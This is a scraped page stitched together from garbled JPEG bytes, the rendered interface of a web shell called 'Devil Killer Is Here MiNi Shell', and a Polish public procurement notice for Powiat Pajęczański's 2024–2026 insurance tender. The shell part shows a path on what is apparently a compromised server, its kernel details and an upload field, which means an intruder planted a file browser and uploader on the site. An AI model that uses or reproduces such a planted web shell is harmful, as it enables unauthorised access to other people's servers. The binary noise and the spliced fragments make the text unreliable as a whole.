JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240726/0043314001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> UBEZPIECZENIE POWIATU PAJĘCZAŃSKIEGO W OKRESIE OD 15.08.2024 r. DO 14.08.2026 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIAT PAJĘCZAŃSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 592298009</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kościuszki 76</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pajęczno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">98-330</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">343113120</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@powiatpajeczno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiatpajeczno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> UBEZPIECZENIE POWIATU PAJĘCZAŃSKIEGO W OKRESIE OD 15.08.2024 r. DO 14.08.2026 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8d9130b4-a975-4640-9fe0-6f30eb070b1c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00433140</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00039818/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 UBEZPIECZENIE POWIATU PAJĘCZAŃSKIEGO W OKRESIE OD 15.08.2024 r. DO 14.08.2026 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/powiatpajeczno <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">8.1.1. Postępowanie o udzielenie niniejszego zamówienia prowadzone jest w języku<br/>polskim.<br/>8.1.2. W niniejszym postępowaniu komunikacja między Zamawiającym,<br/>a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej,<br/>za pośrednictwem: platformy pod adresem:<br/>https://platformazakupowa.pl/pn/powiatpajeczno<br/>8.1.3. Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami:<br/>8.1.3.1. w sprawach proceduralnych:<br/>Katarzyna Białek, Alicja Szymala<br/>tel. 34 311 31 20 wew. 225, 246, e-mail: zamowienia@powiatpajeczno.pl<br/>8.1.3.2. w sprawach merytorycznych:<br/>Daria Wielec<br/>tel. 506 100 416, e-mail: d.wielec@maxima-fides.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">8.1.4. Forma, w jakiej ma być złożona<br/>oferta wraz z załącznikami, w tym oświadczenia składane w celu wstępnego potwierdzenia spełniania warunków udziału w<br/>postępowaniu/wykazania braku podstaw do wykluczenia Wykonawcy z postępowania, określona została odpowiednio w pkt. 8.2<br/>SWZ.<br/>8.1.5. Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem Platformy. Informacje<br/>dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał<br/>na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny<br/>wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem Platformy do konkretnego wykonawcy.<br/>8.1.6. Zamawiający, zgodnie z § 3 ust. 3 Rozporządzenia Prezesa Rady Ministrów w sprawie użycia środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego oraz udostępnienia i przechowywania dokumentów<br/>elektronicznych (Dz. U. z 2017 r. poz. 1320; dalej: “Rozporządzenie w sprawie środków komunikacji”), określa niezbędne wymagania<br/>sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>8.1.6.1. stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>8.1.6.2. komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza<br/>wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>8.1.6.3. zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>8.1.6.4. włączona obsługa JavaScript,<br/>8.1.6.5. zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików pdf,<br/>8.1.6.6. platforma działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>8.1.6.7. Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg.<br/>czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>8.1.7. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>8.1.7.1. akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej<br/>pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>8.1.7.2. zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem:<br/>https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view.<br/>8.1.8. Zamawiający informuje, że instrukcje korzystania z Platformy dotyczące w szczególności logowania, składania wniosków o<br/>wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu Platformy<br/>znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-<br/>instrukcje<br/>8.1.9. Wykonawca podpisuje dokumenty kwalifikowanym podpisem elektronicznym, wystawionym przez dostawcę kwalifikowanej<br/>usługi zaufania, będącego podmiotem świadczącym usługi certyfikacyjne – podpis elektroniczny, spełniające wymogi<br/>bezpieczeństwa określone w ustawie z dnia 5 września 2016 r. o usługach zaufania oraz identyfikacji elektronicznej (t.j. Dz. U. 2020<br/>r. poz. 1173 z późn. zm.). Lista podmiotów udostępniających usługę kwalifikowanego podpisu elektronicznego dostępna jest na<br/>stronie www.nccert.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">21.1. Zgodnie z art. 13 ust. 1 i 2 ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016 r. (rozporządzenie Parlamentu Europejskiego i Rady UE 2016/679 w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy<br/>95/46/WE) uprzejmie informujemy, że:<br/>21.1.1. Administratorem Pani/Pana danych osobowych jest Starostwo Powiatowe w Pajęcznie z siedzibą przy ul. Kościuszki 76, 98-<br/>330 Pajęczno.<br/>21.1.2. W sprawie ochrony danych osobowych można skontaktować się z Inspektorem Ochrony Danych. Dane kontaktowe<br/>Inspektora: adres e-mail: iodo@powiatpajeczno.pl, nr telefonu 34 3113120, adres siedziby Starostwo Powiatowe w Pajęcznie ul.<br/>Kościuszki 76, 98-330 Pajęczno.<br/>21.1.3. Cele i podstawy przetwarzania. Pani/Pana dane osobowe będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO –<br/>wypełnienie obowiązku prawnego ciążącego na administratorze związanego z postępowaniem o udzielenie zamówienia publicznego<br/>prowadzonego w trybie podstawowym bez negocjacji art. 275 pkt 1 pn. „UBEZPIECZENIE Powiatu Pajęczańskiego w okresie od<br/>15.08.2024 r. do 14.08.2026 r.”<br/>21.1.4. Okres przetwarzania Pani/Pana danych osobowych związany jest ze wskazanym powyżej celem ich przetwarzania. Wobec<br/>powyższego dane osobowe będą przetwarzane przez czas, w którym przepisy prawa nakazują Administratorowi przechowywanie<br/>danych lub przez okres przedawnienia ewentualnych roszczeń, do dochodzenia których konieczne jest dysponowanie danymi.<br/>21.1.5. Prawa osoby, której dane dotyczą. W przypadkach i na zasadach określonych w powszechnie obowiązujących przepisach o<br/>ochronie danych osobowych przysługują Pani/Panu prawa do dostępu do swoich danych oraz otrzymania ich kopii, do sprostowania<br/>(poprawiania) danych, ograniczenia ich przetwarzania, wniesienia sprzeciwu wobec ich przetwarzani oraz wniesienia skargi do<br/>Prezesa Urzędu Ochrony Danych Osobowych .<br/>21.1.6. Odbiorcy danych. Pani/Pana dane osobowe będą przekazywane uprawnionym instytucjom określonym przez przepisy<br/>prawa.<br/>21.1.7. Pani/Pana dane osobowe nie będą przekazywane do państwa trzeciego lub organizacji międzynarodowej.<br/>21.1.8. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany.<br/>21.1.9. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Państwa dotyczących jest wymogiem ustawowym<br/>określonym w przepisach Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencje<br/>niepodania określonych danych wynikają z Pzp.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">21.1.5. Prawa osoby, której dane dotyczą. W przypadkach i na zasadach określonych w<br/>powszechnie obowiązujących przepisach o ochronie danych osobowych przysługują Pani/Panu prawa do dostępu do swoich danych<br/>oraz otrzymania ich kopii, do sprostowania (poprawiania) danych, ograniczenia ich przetwarzania, wniesienia sprzeciwu wobec ich<br/>przetwarzani oraz wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych .</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZPI.272.11.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 0 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1. Przedmiotem zamówienia jest usługa polegająca na ubezpieczeniu Powiatu <br/>Pajęczańskiego w zakresie:<br/>3.1.1. ubezpieczenie mienia od wszystkich ryzyk;<br/>3.1.2. ubezpieczenie sprzętu elektronicznego od awarii i uszkodzeń;<br/>3.1.3. ubezpieczenie maszyn, w tym urządzeń samobieżnych oraz montowanych na pojazdach;<br/>3.1.4. ubezpieczenie odpowiedzialności cywilnej; <br/>3.2. Zamawiający nie dopuszcza składnie ofert częściowych. <br/>3.3. Przedmiot zamówienia wg słownika CPV: <br/>66510000-8 – usługi ubezpieczeniowe;<br/>Część 1:<br/>66515000-3 – usługi ubezpieczenia od uszkodzenia lub utraty,<br/>66515200-5 – usługi ubezpieczenia własności,<br/>66515400-7 – usługi ubezpieczenia od skutków żywiołów,<br/>66516400-4 – usługi ubezpieczenia od ogólnej odpowiedzialności cywilnej,<br/>3.4. Opis przedmiotu zamówienia zawarty jest w Dziale II niniejszej SWZ.<br/>3.5. W oparciu o art. 95 ust. 1 ustawy pzp Zamawiający wymaga, aby Wykonawca zatrudniał <br/>na podstawie umowy o pracę w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 r. <br/>4<br/>Kodeks Pracy (tj. Dz. U. z 2023 r., poz. 1465 z późn. zm.) osoby wykonujące wskazane przez <br/>Zamawiającego czynności w zakresie realizacji zamówienia:<br/>3.5.1. odpowiedzialne za nadzór nad realizacją Umowy,<br/>3.5.2. odpowiedzialne za realizację poszczególnych ubezpieczeń opisanych w Umowie Generalnej Ubezpieczenia,<br/>3.5.3. odpowiedzialne za koordynację procesu likwidacji szkód i raportowania <br/>szkodowości.<br/>Uprawnienia zamawiającego w zakresie kontroli spełniania przez wykonawcę wymagań, o których mowa w art. 95 ust. 1, oraz sankcje z tytułu niespełnienia tych wymagań określone zostały w Dziale III Projektowane postanowienia umów w sprawie zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66515000-3 - Usługi ubezpieczenia od uszkodzenia lub utraty</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66515000-3 - Usługi ubezpieczenia od uszkodzenia lub utraty</p> <p class="mb-0">66515200-5 - Usługi ubezpieczenia własności</p> <p class="mb-0">66515400-7 - Usługi ubezpieczenia od skutków żywiołów</p> <p class="mb-0">66516400-4 - Usługi ubezpieczenia od ogólnej odpowiedzialności cywilnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-08-15 do 2026-08-14</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie <br/>następujące kryteria:<br/>16.2.1. „Cena” – waga 90%;<br/>16.2.2. „Warunki ubezpieczenia” – waga 10 %;<br/>Za najkorzystniejszą ofertę zostanie uznana ta, która otrzyma łącznie najwyższą liczbę punktów w kryteriach, o których mowa w pkt. 16.2. Liczba punktów jest zaokrąglana dodwóch miejsc po przecinku</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">warunki ubezpieczenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.2.1. Zamawiający w zakresie zdolności do występowania w obrocie gospodarczym nie precyzuje żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.<br/>6.2.2. Zamawiający wymaga w zakresie uprawnień do prowadzenia określonej <br/>działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>6.2.2.1. Wykonawca jest zobowiązany wykazać, że posiada uprawnienia <br/>do wykonywania działalności stanowiącej przedmiot niniejszego zamówienia <br/>tzn.: prowadzi działalność ubezpieczeniową w myśl ustawy z dnia 11 września 2015 roku o działalności ubezpieczeniowej i reasekuracyjnej (Dz. U. 2020 r. poz. 895 ze zm.), na podstawie zezwolenia co najmniej w następującym zakresie:<br/>− zezwolenie na wykonywanie działalności ubezpieczeniowej określonej w <br/>dziale II – pozostałe ubezpieczenia majątkowe i osobowe, obejmujące <br/>grupy: 8, 9 i 13, opisane w Załączniku nr 1 do ustawy o działalności <br/>ubezpieczeniowej i reasekuracyjnej;<br/>6.2.3. Zamawiający w zakresie sytuacji ekonomicznej lub finansowej nie precyzuje żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.<br/>6.2.4. Zamawiający w zakresie zdolności technicznej lub zawodowej nie precyzuje żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawcy z postępowania o udzielenie zamówienia w okolicznościach, o których mowa w pkt 6.1. SWZ, Wykonawca zobowiązany jest złożyć wraz z ofertą aktualne na dzień składania ofert oświadczenie o braku podstaw <br/>wykluczenia wykonawcy z postępowania – zgodnie ze wzorem stanowiącym Załącznik nr ws3 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>Wykonawca, który złożył najkorzystniejszą ofertę w postępowaniu, zobowiązany jest złożyć, w terminie wyznaczonym przez Zamawiającego:<br/>− oświadczenie o przynależności albo braku przynależności do tej samej grupy <br/>kapitałowej z wykonawcą lub wykonawcami, którzy złożyli oferty w niniejszym <br/>postępowaniu; w przypadku przynależności do tej samej grupy kapitałowej <br/>wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje <br/>potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia <br/>konkurencji w postępowaniu. Wzór oświadczenia stanowi Załącznik nr 5 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu oceny spełniania przez Wykonawcę warunków udziału w postępowaniu, o których mowa w pkt 6.2. SWZ Wykonawca zobowiązany jest złożyć wraz z ofertą aktualne na dzień składania ofert wstępne oświadczenie o spełnianiu warunków udziału w postępowaniu – zgodnie ze wzorem stanowiącym Załącznik nr 4 do SWZ.W celu wykazania braku podstaw wykluczenia <br/><br/>Wykonawca, który złożył najkorzystniejszą ofertę w postępowaniu, zobowiązany jest złożyć, w terminie wyznaczonym przez Zamawiającego:<br/>− aktualne na dzień złożenia zezwolenie zgodnie z pkt. 6.2.2.1</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 7.6. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia:<br/>7.6.1. Zobowiązani są do ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia<br/>publicznego albo reprezentowania w postępowaniu o udzielenie zamówienia publicznego i zawarcia Umowy w sprawie<br/>zamówienia publicznego.<br/>7.6.2. Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia zobowiązany jest samodzielnie wykazać<br/>brak podstaw wykluczenia z postępowania oraz spełnianie warunków udziału w postępowaniu składając wraz z ofertą<br/>oświadczenia, o których mowa w pkt. 6.1 i 6.2.<br/>7.6.3. Oferta Wykonawców występujących wspólnie musi być podpisana i oznaczona w taki sposób, by prawnie<br/>zobowiązywała wszystkie podmioty wspólnie 